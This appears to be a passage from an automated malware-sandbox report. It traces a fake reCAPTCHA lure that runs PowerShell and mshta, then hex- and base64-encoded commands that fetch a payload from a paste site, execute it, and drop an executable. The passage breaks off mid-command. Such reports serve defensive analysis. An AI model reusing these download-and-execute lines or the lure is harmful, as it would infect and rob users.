      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49698 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49699 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49889 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49890 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49904 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49910 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49912 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49914 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49913 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49915 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.25.207:443 -> 192.168.2.16:50011 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.205.226:443 -> 192.168.2.16:50025 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 174.138.125.138:443 -> 192.168.2.16:50028 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.205.226:443 -> 192.168.2.16:50033 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50036 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50037 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50039 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50040 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50041 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50042 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50043 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50044 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50045 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.16:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.26.127:443 -> 192.168.2.16:50047 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.68.188:443 -> 192.168.2.16:50049 version: TLS 1.2

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeJump to dropped file
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 6000
      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 6000
      Source: classification engineClassification label: mal84.phis.troj.expl.evad.win@32/180@69/254
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4016:120:WilError_03
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeMutant created: \Sessions\1\BaseNamedObjects\ContemplativeFish
      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\chrome_BITS_5892_1646954228\BIT828.tmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
      Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://annavirgili.com/
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1984,i,16319034314027490977,6169393010866710073,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1984,i,16319034314027490977,6169393010866710073,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" . \*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\m??ta.??? https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1 # ? ''I am not a robot - reCAPTCHA Verification ID: 7126''
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0x$& ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy UnRestricted -Enc bABzACAAcABhAG4AeQBvACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAbQBpACAAJwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGcATQBXAEkAcABFAEgATgBWAGkAewBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABEAHYAZwB5AGkASgB4AHUAVAB0ACgAcwB0AHIAaQBuAGcAIAB1AHIAbAApAHsAcgBlAHQAdQByAG4AIAAoAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKQApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAdQByAGwAKQA7AH0AfQAnADsAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABCAEYAIAAnAGgAdAB0AHAAcwA6AC8ALwBuAG8AcABhAHMAdABlAC4AbgBlAHQALwBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAJwA7ACYAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQAuAFAAcwBPAGIAagBlAGMAdAAuAE0AZQB0AGgAbwBkAHMAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBjAGwAaQBrAGUAJwBHACoAZAAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQB8AEcATQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGMAbABpAGsAZQAnACoAbwBtACoAZQAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAJwAqAC0AVAB5ACoAZQAnACwAMQAsADEAKQAsAFsATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBDAG8AbQBtAGEAbgBkAFQAeQBwAGUAcwBdADoAOgBDAG0AZABsAGUAdAApAC0ATABhACAAQwBTAGgAYQByAHAAIAAoAEwAUwAgAFYAYQByAGkAYQBiAGwAZQA6AC8ARQBtAGkAKQAuAFYAYQBsAHUAZQA7ACgAWwBnAE0AVwBJAHAARQBIAE4AVgBpAF0AOgA6AEQAdgBnAHkAaQBKAHgAdQBUAHQAKAAoAEcAVgAgAEIARgAgAC0AVgBhAGwAdQBlAE8AbgBsACkAKQApAHwAJgAoAEcASQAgAEEAbABpAGEAcwA6AEkARQAqACkA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF57.tmp" "c:\Users\user\AppData\Local\Temp\CSC2CD5A3AC9BED45FD9C1F4AD4196788AE.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0x$& ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy UnRestricted -Enc 